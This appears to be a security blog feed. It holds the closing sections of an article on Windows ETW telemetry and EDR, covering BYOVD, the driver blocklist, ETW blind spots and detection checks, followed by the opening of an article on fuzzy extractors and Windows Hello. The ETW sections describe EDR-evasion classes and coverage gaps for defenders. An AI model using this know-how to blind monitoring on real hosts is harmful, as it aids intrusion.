&lt;p&gt;The blocklist enumerates known-vulnerable signed drivers by hash; the kernel refuses to load anything on the list. On a Windows 11 22H2-or-later host with the default settings, the BYOVD primitive against most known-vulnerable drivers is closed. With HVCI on, the closure is enforced even against attackers who would otherwise try to load drivers via legacy paths. The empirical bound is the LOLDrivers project&apos;s catalogue of known-vulnerable drivers; the blocklist tracks public discovery with a lag of approximately one quarter, which is the residual window an attacker can exploit before a freshly disclosed driver is added.&lt;/p&gt;

The attack pattern of loading a known-vulnerable but signed driver to obtain a kernel-mode primitive (memory read, memory write, or arbitrary code execution). Used in real-world EDR-blinding attacks, including by the Lazarus Group as cited in Trail of Bits&apos; 2023 ETW walk [@trailofbits-shafir].

The Microsoft-maintained blocklist of known-vulnerable signed drivers, by hash. Enabled by default on Windows 11 22H2 and later. Enforced more strictly when HVCI, Smart App Control, or S mode is active. Updated quarterly per the Microsoft Learn primary [@ms-vdb].
&lt;p&gt;The LOLDrivers project [@loldrivers] [@loldrivers] is the empirical anchor for the BYOVD lag story. It catalogues known-vulnerable signed drivers as a community resource; the Microsoft blocklist updates quarterly, but blocklist updates are also delivered through monthly Windows servicing, so a freshly-disclosed driver can live in an exploitation window of as short as ~1 month (via Patch Tuesday) or up to a full quarter before its hash is added.&lt;/p&gt;

flowchart LR
    subgraph Attacks
        A1[&quot;Gen 1 2014-2018: Autologger registry tampering -- Palantir CIRT taxonomy&quot;]
        A2[&quot;Gen 2 2020: EtwEventWrite 0xC3 RET -- Adam Chester&quot;]
        A3[&quot;Gen 3 2021-2023: Kernel _ETW_GUID_ENTRY -- EtwpRegistration EtwpStopTrace via BYOVD&quot;]
    end
    subgraph Defenses
        D1[&quot;Sysmon Event ID 13 -- monitor Autologger subtree&quot;]
        D2[&quot;Antimalware-PPL plus ELAM -- gate on EtwTi 2017&quot;]
        D3[&quot;Vulnerable Driver Blocklist -- default-on Win11 22H2 plus HVCI&quot;]
    end
    A1 --&amp;gt; D1
    A2 --&amp;gt; D2
    A3 --&amp;gt; D3
&lt;h3&gt;The 2026 picture&lt;/h3&gt;
&lt;p&gt;User-mode patching cannot reach the kernel-mode provider that EDR cares about. The BYOVD primitive that could reach it is structurally narrowed by default on supported hardware. The remaining gap is the long tail of newly-disclosed vulnerable drivers between disclosure and blocklist update, plus any custom kernel zero-day an attacker discovers in an EDR&apos;s own driver. Both are real, both are exploited in the wild, neither is the universally-applicable evasion the 2020-era user-mode patch class was.&lt;/p&gt;
&lt;p&gt;That is the operational story. But ETW has structural limits even when no attacker is patching anything.&lt;/p&gt;
&lt;h2&gt;12. Theoretical limits: what ETW cannot see, even with every defence engaged&lt;/h2&gt;
&lt;p&gt;Even on a perfectly-configured Windows 11 box -- HVCI [@paragmali-com-in-windows] on, Vulnerable Driver Blocklist on, Antimalware-PPL Defender consuming EtwTi, third-party EDR ELAM-onboarded -- there are events ETW does not emit. Some are observed too late. Some are not observed at all.&lt;/p&gt;
&lt;p&gt;There are three structural ceilings.&lt;/p&gt;
&lt;h3&gt;Pre-ETW kernel paths&lt;/h3&gt;
&lt;p&gt;The Global Logger session is one of the earliest things to come up at boot, but it is not the first. Some early-init driver paths run before any ETW session exists; they cannot be traced via ETW. Measured Boot is the discipline that records this prefix into TPM PCRs, with attestation handled by the platform integrity layer rather than by ETW. The implication for EDR is that any malicious code executing during early boot, before the Global Logger session is up, is invisible to ETW.&lt;/p&gt;
&lt;h3&gt;Incomplete EtwTi syscall coverage&lt;/h3&gt;
&lt;p&gt;The 10 &lt;code&gt;KERNEL_THREATINT_TASK_*&lt;/code&gt; task IDs are the public surface. The underlying syscall set the kernel actually instruments is not exhaustively documented. The fluxsec.red inventory [@fluxsec-eti] [@fluxsec-eti] is the public surface, not the private one. Some syscalls are clearly covered (&lt;code&gt;NtAllocateVirtualMemory&lt;/code&gt; for cross-process allocation surfaces as &lt;code&gt;KERNEL_THREATINT_TASK_ALLOCVM&lt;/code&gt;); some have partial coverage (&lt;code&gt;MAPVIEW_LOCAL&lt;/code&gt; and &lt;code&gt;MAPVIEW_REMOTE&lt;/code&gt; keywords cover some but not all of the section-mapping primitive set across &lt;code&gt;NtCreateSection&lt;/code&gt;, &lt;code&gt;NtMapViewOfSection&lt;/code&gt;, &lt;code&gt;NtMapViewOfSectionEx&lt;/code&gt;, image-section vs file-section variants); some are not enumerated at all in the public manifest. Process-hollowing primitives that combine &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt; and &lt;code&gt;NtMapViewOfSection&lt;/code&gt; may be partially covered depending on which path the attacker takes.&lt;/p&gt;
&lt;h3&gt;The async-flush gap&lt;/h3&gt;
&lt;p&gt;ETW&apos;s per-CPU ring buffer is asynchronous. If a process allocates RWX memory, writes shellcode, executes it, and returns within one writer-thread flush interval, the event is &lt;em&gt;recorded&lt;/em&gt; but the attacker&apos;s payload has &lt;em&gt;already executed&lt;/em&gt;. The synchronous denial primitive on Windows belongs to kernel notify routines, not to ETW. The Microsoft Learn primary on About Event Tracing [@ms-about-etw] [@ms-about-etw] is explicit that events can be lost:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Events can be lost if any of the following conditions occur ... The total event size is greater than 64K ... The disk is too slow to keep up with the rate at which events are being generated. ... For real-time logging, the real-time consumer is not consuming events fast enough.&quot; -- [@ms-about-etw]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;No ETW-only EDR can prevent a syscall whose payload completes inside one writer flush. EDRs that ship a kernel driver and register synchronous callbacks (CrowdStrike, SentinelOne, Sysmon, Elastic Defend) can deny operations through the &lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt; [@ms-pssetprocnotify] [@ms-pssetprocnotify] &lt;code&gt;CreationStatus&lt;/code&gt; field; ETW-only EDRs cannot. ETW is observation, not enforcement.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; ETW is observation, not enforcement. The synchronous denial primitive on Windows belongs to kernel notify routines, not to ETW. Sub-microsecond payloads execute before the writer thread flushes; the layered defense stack of 2026 is an empirical bar, not a theoretical guarantee.&lt;/p&gt;
&lt;/blockquote&gt;

The VBS-backed code-integrity enforcement for kernel-mode code on Windows. With HVCI enabled, the hypervisor enforces that only signed kernel pages can execute. Closes the attack class that loads unsigned drivers; combined with the Vulnerable Driver Blocklist it closes most of the realistic BYOVD primitive surface as well.
&lt;p&gt;The &quot;events can be lost&quot; enumeration in [@ms-about-etw] is the dispositive Microsoft acknowledgement of ETW&apos;s lossy substrate. SOC playbooks should treat ETW telemetry as best-effort, not as a guaranteed audit trail. Forensic claims that depend on completeness need an independent corroborating source.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A detection-only EDR can alert on a malicious operation, but only after the operation has happened. By the time the SOC sees the alert, the syscall has completed, the shellcode has executed, the credentials have been stolen. This is why the kernel-callback path (with its ability to deny via &lt;code&gt;CreationStatus&lt;/code&gt;) coexists with ETW even though ETW is more flexible: a SOC playbook needs both the speed of denial and the breadth of observation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The 2026 layered stack -- Antimalware-PPL + EtwTi + HVCI + VBL -- raises the empirical bar enormously. It does not close the architectural gap. Sub-microsecond payloads still execute before the writer thread flushes. The BYOVD primitive on a non-HVCI box still defeats the kernel-callback layer. There are still problems the substrate cannot solve in principle.&lt;/p&gt;
&lt;p&gt;Those are the limits we can describe. The next section is about the limits we cannot yet measure.&lt;/p&gt;
&lt;h2&gt;13. Open problems: keyword drift, secure kernel ETW, and the BYOVD arms race&lt;/h2&gt;
&lt;p&gt;The 2026 state of the art has five active open problems. Each has a partial workaround; none has a complete solution.&lt;/p&gt;
&lt;h3&gt;1. EtwTi keyword inventory drift across builds&lt;/h3&gt;
&lt;p&gt;Microsoft has not published a complete, current &lt;code&gt;Microsoft-Windows-Threat-Intelligence&lt;/code&gt; keyword inventory. The community-maintained references -- the jdu2600 cross-build inventory [@gh-jdu2600] [@gh-jdu2600] and the repnz manifest archive [@gh-repnz] [@gh-repnz] -- are partial coverage and lag Microsoft&apos;s quarterly servicing cadence. EDR vendors that hard-code keyword bitmasks against an old build can silently miss events on newer builds because the keyword definitions have shifted underneath them. Detection engineers writing rules against &lt;code&gt;KERNEL_THREATINT_TASK_*&lt;/code&gt; IDs that move between builds can get false negatives.&lt;/p&gt;

There are three plausible reasons, and Microsoft has not stated which (or which combination) is operative. *Operational secrecy*: a complete keyword inventory tells attackers exactly which syscall paths are observed and which are not, narrowing the search for evasion paths. *Documentation cost*: the inventory shifts every build, and maintaining a synchronised public reference is engineering work without an obvious internal champion. *Deliberate moving target*: keeping the public surface incomplete forces attackers to reverse-engineer per build, raising the cost of stable evasion. The community references partially defeat all three rationales; the absence remains.
&lt;h3&gt;2. Secure ETW (the &lt;code&gt;EtwSi*&lt;/code&gt; family)&lt;/h3&gt;
&lt;p&gt;Windows VBS Trustlets run in the Secure Kernel (VTL1), insulated from the normal-world kernel (VTL0) by the hypervisor. The Secure Kernel exposes its own ETW family for VTL1 components; this is enumerated in fragments in Alex Ionescu&apos;s BlackHat 2015 deck on the Secure Kernel and in subsequent BlueHatIL talks. There is no public consumer-facing primary on &lt;code&gt;EtwSi*&lt;/code&gt; in 2026. Cross-link: this article&apos;s companion piece on VBS Trustlets [@paragmali-vbs-trustlets] [@paragmali-vbs-trustlets] covers the producer side of the story.&lt;/p&gt;
&lt;h3&gt;3. Forensic soundness of ETW telemetry&lt;/h3&gt;
&lt;p&gt;ETW is lossy by design (per the [@ms-about-etw] enumeration). Whether ETW-derived telemetry is &lt;em&gt;forensically sound&lt;/em&gt; -- chain-of-custody complete, lossless under load, attestable as untampered between event emission and SIEM ingestion -- is an open question. Courts have not ruled. The current best partial result is to treat ETW as supporting evidence and require independent corroboration (file-system snapshots, network captures, OS state captures) for any claim that depends on completeness. Sysmon&apos;s Event ID 16 (Sysmon configuration changed) [@ms-sysmon] and the autologger registry write events on &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\&lt;/code&gt; are useful integrity signals: an attacker who silenced ETW typically leaves a footprint here.&lt;/p&gt;
&lt;h3&gt;4. The BYOVD arms race&lt;/h3&gt;
&lt;p&gt;The Vulnerable Driver Blocklist [@ms-vdb] [@ms-vdb] is hash-based and updated quarterly. The LOLDrivers project [@loldrivers] [@loldrivers] documents the public catalogue of known-vulnerable signed drivers. The gap between disclosure and blocklist update--as short as ~1 month via Patch Tuesday or up to a full quarter--is the residual exploitation window. The deeper structural issue is that the blocklist is hash-based; an attacker who finds a new vulnerability in a previously-trusted signed driver enjoys a fresh window every quarter. Closing this gap requires either a different trust model (allow-listing of known-good drivers, as Smart App Control does for executables) or behavioural detection of suspicious driver loads. Both are active areas of work.&lt;/p&gt;
&lt;h3&gt;5. Cross-process section-mapping coverage&lt;/h3&gt;
&lt;p&gt;EtwTi&apos;s &lt;code&gt;KERNEL_THREATINT_TASK_MAPVIEW&lt;/code&gt; covers some but not all section-mapping primitives. The public fluxsec.red [@fluxsec-eti] inventory lists &lt;code&gt;MAPVIEW_LOCAL&lt;/code&gt; and &lt;code&gt;MAPVIEW_REMOTE&lt;/code&gt; keywords, but the underlying syscall set (&lt;code&gt;NtMapViewOfSection&lt;/code&gt;, &lt;code&gt;NtMapViewOfSectionEx&lt;/code&gt;, &lt;code&gt;NtCreateSection&lt;/code&gt;, image-section vs file-section variants) is not exhaustively documented. Detection engineers who depend on full coverage of cross-process section mapping are working from an incomplete map.&lt;/p&gt;
&lt;h3&gt;What would a v2 ETW look like?&lt;/h3&gt;
&lt;p&gt;A theoretical ideal: synchronous kernel-emitted events on every security-relevant syscall, with the consumer running in VTL1 (Secure Kernel) so even a kernel-mode attacker in VTL0 cannot tamper with the consumer. The &lt;code&gt;EtwSi*&lt;/code&gt; family is the partial realisation. The full ideal is incompatible with x64 syscall performance: synchronous notification on every syscall would dominate the cost of the syscall itself. The pragmatic answer Microsoft has been building toward is &lt;em&gt;selective&lt;/em&gt; synchronous notification (the kernel notify routines for high-value control points) layered with &lt;em&gt;broad&lt;/em&gt; asynchronous observation (ETW for everything else), with the most security-critical of the broad observations promoted to PPL/ELAM-gated kernel-emitted producers (EtwTi). Two decades of layering, no single architectural endpoint.For the producer side of the Secure Kernel ETW story (&lt;code&gt;EtwSi*&lt;/code&gt;), see this article&apos;s companion piece on VBS Trustlets [@paragmali-vbs-trustlets] [@paragmali-vbs-trustlets] in the same series. The Trustlet-side architecture is a separate topic large enough to need its own walkthrough.&lt;/p&gt;
&lt;p&gt;Open problems are interesting but they are not actionable. The next section is about what an engineer can do on Monday morning.&lt;/p&gt;
&lt;h2&gt;14. Practical guide: five things to do Monday morning&lt;/h2&gt;
&lt;p&gt;You have read 12,000 words about ETW. Here are five concrete checks an engineer can run on a Windows host this morning.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;logman query providers&lt;/code&gt; enumerates every registered provider on the host. Cross-reference the output against the section 8 catalogue and flag any security-relevant provider your EDR is not consuming. Pay specific attention to &lt;code&gt;Microsoft-Antimalware-Scan-Interface&lt;/code&gt;, &lt;code&gt;Microsoft-Windows-PowerShell&lt;/code&gt;, &lt;code&gt;Microsoft-Windows-DotNETRuntime&lt;/code&gt;, and &lt;code&gt;Microsoft-Windows-Sysmon&lt;/code&gt; if Sysmon is installed. Missing coverage of any of these on a host you are responsible for is a detection-coverage gap, not a configuration issue.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Run &lt;code&gt;wevtutil gp Microsoft-Windows-Threat-Intelligence&lt;/code&gt; to confirm the provider is registered and inspect its keyword definitions. Then check whether your EDR is actually a consumer: walk the live-debugger handle enumeration in Yarden Shafir&apos;s Trail of Bits post [@trailofbits-shafir] [@trailofbits-shafir] (the WinDbg JS scripts are linked from the post). If your EDR is supposed to be ELAM-onboarded but does not appear in the consumer enumeration for an EtwTi logger session, your installation may have lost the gate. This is the difference between a configured EDR and a functional EDR.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Enumerate &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\&lt;/code&gt; for unauthorised session entries. Per the Palantir CIRT taxonomy [@palantir-tampering-wayback] [@palantir-tampering-wayback], this is the persistent-tampering surface. A baseline audit should produce a known list of expected sessions (Defender, your EDR, Sysmon if installed, the standard Windows diagnostic listeners). Any subkey not on the baseline list is an investigation candidate. Sysmon Event ID 13 (registry value set) [@ms-sysmon] on this subtree is a high-signal alert in any SIEM.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Run &lt;code&gt;Get-CimInstance Win32_DeviceGuard | Select-Object SecurityServicesConfigured, SecurityServicesRunning, VirtualizationBasedSecurityStatus&lt;/code&gt; to expose whether HVCI and the Vulnerable Driver Blocklist are active. Per the Microsoft Learn primary [@ms-vdb] [@ms-vdb], the BYOVD ceiling is your kernel-tampering integrity guarantee. If VBS is &lt;code&gt;Off&lt;/code&gt; on a managed endpoint, your detection coverage is structurally weaker than it should be on supported hardware. Treat it as a hardening item, not a nice-to-have.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Write a hunting query for the pattern: &quot;process X registers as ETW consumer for &lt;code&gt;Microsoft-Windows-Threat-Intelligence&lt;/code&gt; and X is not on the EDR allow-list.&quot; The provider&apos;s PPL+ELAM gate makes this a high-signal alert: only a signed Antimalware-PPL service can pass the gate, so an unexpected process holding an &lt;code&gt;EtwConsumer&lt;/code&gt; handle to the TI logger ID is either a misconfigured tool, a legitimate research session you forgot about, or an attacker chain that has acquired Antimalware-PPL trust on your fleet. The first two are quick to triage; the third is an incident.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The structure of the check in pseudocode -- mirroring the WinDbg JS approach in [@trailofbits-shafir]:&lt;/p&gt;
&lt;p&gt;{`
// Pseudocode: inventory providers and identify EtwTi consumers.&lt;/p&gt;
&lt;p&gt;// 1. Enumerate registered providers and find Microsoft-Windows-Threat-Intelligence.
const providers = enumerateRegisteredProviders();
const tiProvider = providers.find(p =&amp;gt; p.guid === &quot;{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}&quot;);
if (!tiProvider) {
  warn(&quot;EtwTi provider not registered on this host&quot;);
}&lt;/p&gt;
&lt;p&gt;// 2. Enumerate live trace sessions and find any that subscribe to TI.
const sessions = enumerateLoggerSessions();  // logman query -ets equivalent
const tiSessions = sessions.filter(s =&amp;gt;
  s.providers.some(p =&amp;gt; p.guid === tiProvider?.guid));&lt;/p&gt;
&lt;p&gt;// 3. Walk EtwConsumer handles for each TI session; identify the consuming processes.
const expectedConsumers = [&quot;MsMpEng.exe&quot;, &quot;CSFalconService.exe&quot;, &quot;SentinelAgent.exe&quot;];
for (const session of tiSessions) {
  const consumers = enumerateEtwConsumers(session.loggerId);  // Shafir WinDbg JS
  for (const consumer of consumers) {
    if (!expectedConsumers.includes(consumer.processName)) {
      alert(`Unexpected EtwTi consumer: ${consumer.processName} (PID ${consumer.pid})`);
    }
  }
}&lt;/p&gt;
&lt;p&gt;// 4. Audit autologger persistence entries against a known baseline.
const baseline = loadAutologgerBaseline();
const live = enumerateAutologgerSubkeys();  // HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger
for (const entry of live) {
  if (!baseline.includes(entry.name)) {
    alert(`Unexpected autologger entry: ${entry.name}`);
  }
}
`}&lt;/p&gt;
&lt;p&gt;With those five checks, the catalogue is no longer an abstraction. You have an inventory of what your host emits, an inventory of who consumes the most security-critical provider, an audit of the persistence surface that defines what gets emitted at all, a confirmation of the integrity layer that closes BYOVD, and a hunt for anyone who has somehow obtained the passport. Now we close with the questions every reader should expect to have.&lt;/p&gt;
&lt;h2&gt;15. Frequently asked questions&lt;/h2&gt;

Yes, for *publication*. Sysmon&apos;s kernel driver `SysmonDrv.sys` registers `PsSetCreateProcessNotifyRoutineEx` and the related thread- and image-load callbacks; the user-mode service then publishes the resulting events via its own `Microsoft-Windows-Sysmon` ETW provider GUID `{5770385F-C22A-43E0-BF4C-06F5698FFBD9}` [@ms-sysmon]. It does not consume the public catalogue providers via ETW for its kernel-event hot path; the kernel taps come straight from the callback API. This callback-then-publish architecture is why Sysmon&apos;s events are universally consumable by SIEM forwarders and downstream tools.

Because Defender consumes `Microsoft-Windows-Threat-Intelligence`, which fires from the kernel side of memory-modifying syscalls, not from the user-mode `ntdll!EtwEventWrite` trampoline. The fluxsec.red walkthrough states the asymmetry verbatim: &quot;we cannot patch out the Threat Intelligence provider as this is emitted from within the kernel itself&quot; [@fluxsec-eti]. The Adam Chester 2020 patch silences user-mode providers (like `Microsoft-Windows-DotNETRuntime`) for the patched process; it cannot silence kernel-emitted providers for any process. Defender&apos;s load-bearing security signal is structurally out of reach of the user-mode patch class.

No. The provider&apos;s security descriptor admits only Antimalware-PPL signers loaded by an ELAM driver. A non-PPL `EnableTraceEx2` call against the EtwTi GUID returns `ERROR_ACCESS_DENIED` (the Microsoft Learn primary on EnableTraceEx2 [@ms-enabletraceex2] [@ms-enabletraceex2] documents the error code for insufficient-privilege callers; the PPL-specific gate that triggers it for EtwTi is described in [@fluxsec-eti]). The gate exists because an attacker who could trivially become an EtwTi consumer would have direct visibility into the kernel&apos;s view of every memory-modifying syscall on the host -- exactly the inventory needed to evade everything else.

Schema location. Manifest-based providers ship an out-of-band XML manifest registered with `wevtutil im`; consumers decode events against the system-installed manifest using TDH. TraceLogging providers carry the schema *inline* in each event payload as type-length-value triples; consumers decode without any registered manifest. TraceLogging events are larger because the schema bytes ride in the payload; manifest events have a smaller per-event size at the cost of installation friction. Both inherit the eight-session cap [@ms-about-etw], [@ms-tracelogging-about].

Sixty-four globally per [@ms-etw-sessions], with Windows 2000 limited to 32. Per-provider, manifest-based and TraceLogging providers admit up to 8 simultaneous sessions; classic and WPP providers admit only 1 [@ms-about-etw], [@ms-etw-config]. The runtime symptom of the per-provider 8-session cap binding is `ERROR_NO_SYSTEM_RESOURCES` from `EnableTraceEx2` [@ms-enabletraceex2]; the runtime symptom of the global 64-session cap binding is the same error from `StartTrace`.

No. EventPipe is a managed-runtime cross-platform analogue to ETW that shipped in .NET Core 3.0 (September 2019) and remains available in every later release including .NET 5+. It runs on Linux and macOS as well as Windows. On Windows, the kernel-mode providers and the EtwTi security substrate have no EventPipe equivalent; EventPipe is a complement to ETW for managed workloads, not a replacement. The Windows EDR substrate remains ETW; managed-runtime tracing has acquired an additional cross-platform path that does not displace it.
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;etw-event-tracing-for-windows-and-the-edr-substrate&quot; keyTerms={[
  { term: &quot;ETW&quot;, definition: &quot;Event Tracing for Windows: kernel-buffered observability bus introduced in Windows 2000.&quot; },
  { term: &quot;Provider&quot;, definition: &quot;A component that emits ETW events tagged with a GUID.&quot; },
  { term: &quot;Controller&quot;, definition: &quot;A component that creates, configures, and stops trace sessions.&quot; },
  { term: &quot;Consumer&quot;, definition: &quot;A component that reads events from a session in real time or from an .etl file.&quot; },
  { term: &quot;Manifest-based provider&quot;, definition: &quot;Vista-era ETW provider class with XML manifest schema and 8-session cap.&quot; },
  { term: &quot;TraceLogging&quot;, definition: &quot;Self-describing ETW provider class with inline TLV schema, shipped in Windows 10.&quot; },
  { term: &quot;EtwTi&quot;, definition: &quot;Microsoft-Windows-Threat-Intelligence: the kernel-emitted memory-syscall provider; PPL+ELAM-gated.&quot; },
  { term: &quot;Antimalware-PPL&quot;, definition: &quot;Signer level on the PPL lattice for antimalware services; gates EtwTi consumption.&quot; },
  { term: &quot;ELAM&quot;, definition: &quot;Early Launch Antimalware: driver class that gates the certificate inventory for permitted Antimalware-PPL binaries.&quot; },
  { term: &quot;BYOVD&quot;, definition: &quot;Bring Your Own Vulnerable Driver: load a known-vulnerable signed driver to obtain kernel primitive.&quot; },
  { term: &quot;Vulnerable Driver Blocklist&quot;, definition: &quot;Microsoft-maintained hash blocklist; default-on in Windows 11 22H2.&quot; },
  { term: &quot;Autologger&quot;, definition: &quot;Registry-persisted boot-time ETW session under HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\.&quot; }
]} /&amp;gt;&lt;/p&gt;
&lt;p&gt;ETW is now twenty-six years old. It started as a performance facility for Windows 2000 driver authors who could not afford &lt;code&gt;DbgPrint&lt;/code&gt; on production servers, and it became the substrate of every major Windows endpoint security product through a decade of unintended consequences. The Vista team that raised the per-provider session cap from 1 to 8 was thinking about ergonomics. The Windows 8.1 team that introduced Antimalware-PPL was thinking about Defender&apos;s hardening, not about future third-party EDRs. The team that shipped EtwTi in the Windows 10 RS-era understood the security stakes precisely. By 2026 those three decisions, taken in three different Microsoft contexts a decade apart, are the architecture of detection on the Windows endpoint -- and the reason the operator in the section 1 hook scene loses the round even when the patch works exactly as it should.&lt;/p&gt;
</content:encoded><category>etw</category><category>windows-internals</category><category>edr</category><category>security</category><category>kernel</category><category>detection-engineering</category><category>threat-intelligence</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Fuzzy Extractors and the One Inequality That Explains Why Windows Hello Doesn&apos;t Use One</title><link>https://paragmali.com/blog/fuzzy-extractors-windows-hello/</link><guid isPermaLink="true">https://paragmali.com/blog/fuzzy-extractors-windows-hello/</guid><description>Fuzzy extractors turn noisy biometrics into stable cryptographic keys. A single 2004 inequality explains why Windows Hello deliberately does not use one.</description><pubDate>Mon, 11 May 2026 00:00:00 GMT</pubDate><content:encoded>
A fuzzy extractor turns a noisy, low-entropy biometric reading into a stable, uniformly random cryptographic key, with a public helper string that leaks negligibly little about the key. The Dodis-Reyzin-Smith 2004 construction is the canonical primitive: a secure sketch composed with a strong randomness extractor, governed by a single security inequality that bounds the extractable key length by the source min-entropy, minus the code redundancy, minus twice the security parameter. For consumer face and fingerprint at realistic noise levels, that inequality forbids a cryptographically useful key. Windows Hello -- and Apple Face ID -- consequently use a *match-then-unwrap-TPM-sealed-key* architecture instead, in which the biometric is a gate, not an input to key derivation.
&lt;h2&gt;1. Why can&apos;t a fingerprint just be a password?&lt;/h2&gt;
&lt;p&gt;A developer building a login system writes &lt;code&gt;key = SHA256(fingerprint_image)&lt;/code&gt;, ships it, and never logs in again. Two scans of the same finger produce two slightly different images, the hash is avalanche-sensitive by design, and the cryptographic key is unrecoverable on every authentication after the first. The fix is not a bigger hash. The fix is a new cryptographic primitive.&lt;/p&gt;
&lt;p&gt;The mistake is universal because the temptation is universal. A fingerprint feels like a password: it identifies you, it is hard to forge, and you carry it everywhere. So why not just hash it into a 256-bit key the way every developer has hashed a password for thirty years? The answer is mechanical. SHA-256 is an avalanche function: flipping a single input bit flips, on average, half the output bits. A fingerprint sensor returns a slightly different image every time you press your finger to the glass; one stray dust mote, one degree of rotation, one pixel of pressure variation, and the input has changed in thousands of bits. The hash is statistically independent of the previous one. The key is gone.&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;// Two near-identical 128-bit &quot;fingerprint readings&quot; differing in just 5 bits const enc = new TextEncoder(); async function sha256Hex(bytes) {   const h = await crypto.subtle.digest(&apos;SHA-256&apos;, bytes);   return [...new Uint8Array(h)].map(b =&amp;gt; b.toString(16).padStart(2,&apos;0&apos;)).join(&apos;&apos;); } const w1 = new Uint8Array(16); for (let i = 0; i &amp;lt; 16; i++) w1[i] = (i * 37) &amp;amp; 0xff; const w2 = w1.slice(); w2[3] ^= 0x01; w2[7] ^= 0x10; w2[11] ^= 0x02; w2[12] ^= 0x40; w2[15] ^= 0x80; const h1 = await sha256Hex(w1), h2 = await sha256Hex(w2); let diff = 0; for (let i = 0; i &amp;lt; 64; i++) if (h1[i] !== h2[i]) diff++; console.log(&apos;reading 1 hash:&apos;, h1); console.log(&apos;reading 2 hash:&apos;, h2); console.log(&apos;hex digits that differ:&apos;, diff, &apos;/ 64&apos;); console.log(&apos;the second hash shares nothing with the first&apos;);&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;Any biometric authentication scheme has to confront two simultaneous problems. The first is that biometric readings are &lt;em&gt;noisy&lt;/em&gt;: two scans of the same finger differ in many bits, two photos of the same face under different lighting differ in millions. The second is that biometric distributions are &lt;em&gt;low-entropy&lt;/em&gt;: fingerprints, faces, and even irises are far from uniformly random bitstrings; they cluster heavily, and a clever guesser can do much better than brute force.&lt;/p&gt;
&lt;p&gt;The Dodis-Reyzin-Smith framing of these two facts, in the introduction of their 2004 paper, is precise: &quot;strings that are neither uniformly random nor reliably reproducible seem to be more plentiful&quot; than the well-behaved strings classical cryptography assumes [@dors-2008-siamjc]. Hao, Anderson, and Daugman put the engineering version of the problem in one sentence: &quot;the main obstacle to algorithmic combination is that biometric data are noisy; only an approximate match can be expected to a stored template. Cryptography, on the other hand, requires that keys be exactly right, or protocols will fail&quot; [@hao-anderson-daugman-2005-tr].&lt;/p&gt;

A pair of algorithms $(\text{Gen}, \text{Rep})$ such that $\text{Gen}(w) \to (R, P)$ produces a uniformly random key $R \in \{0,1\}^\ell$ and a public helper string $P$, while $\text{Rep}(w&apos;, P) \to R$ recovers the same key $R$ for any $w&apos;$ within distance $t$ of $w$. The helper $P$ may be public; it must leak only negligibly about $R$ under any source $W$ of sufficient min-entropy [@dors-2008-siamjc].
&lt;p&gt;A fuzzy extractor is the primitive built to solve exactly this design problem. Given a noisy source $w$ with at least $m$ bits of min-entropy, $\text{Gen}$ produces a stable key $R$ and a public helper $P$; given any reading $w&apos;$ within Hamming distance $t$ of the original, $\text{Rep}$ recovers $R$ identically. The helper $P$ is allowed to be public; the security guarantee says $P$ leaks at most $\varepsilon$ bits about $R$ in statistical distance. This primitive is the right answer to the developer&apos;s mistake at the top of the section, and it has been the subject of twenty years of beautiful cryptographic theory.&lt;/p&gt;
&lt;p&gt;So here is the puzzle the rest of the article will solve. Every major consumer biometric authentication product -- &lt;a href=&quot;https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/&quot; rel=&quot;noopener&quot;&gt;Windows Hello&lt;/a&gt; (2015), Apple Touch ID (2013), Apple Face ID (2017) -- has explicitly avoided this primitive. None of them derives a cryptographic key from your biometric. Why? The answer takes nine more sections, and it bottoms out on one inequality.&lt;/p&gt;
&lt;h2&gt;2. Historical origins: the 1990s problem statement&lt;/h2&gt;
&lt;p&gt;By the late 1990s the smartcard-and-PKI deployment wave had forced an uncomfortable question on the cryptographic community: how do you bind a long-lived private key to a &lt;em&gt;person&lt;/em&gt; rather than a &lt;em&gt;device&lt;/em&gt;? Smartcards were cheap to mass-produce, but they were also cheap to steal, and PINs got shared the moment any user found them inconvenient. Tying the key to a fingerprint or an iris reading promised a way out, but the underlying mathematics had not yet been written down.&lt;/p&gt;
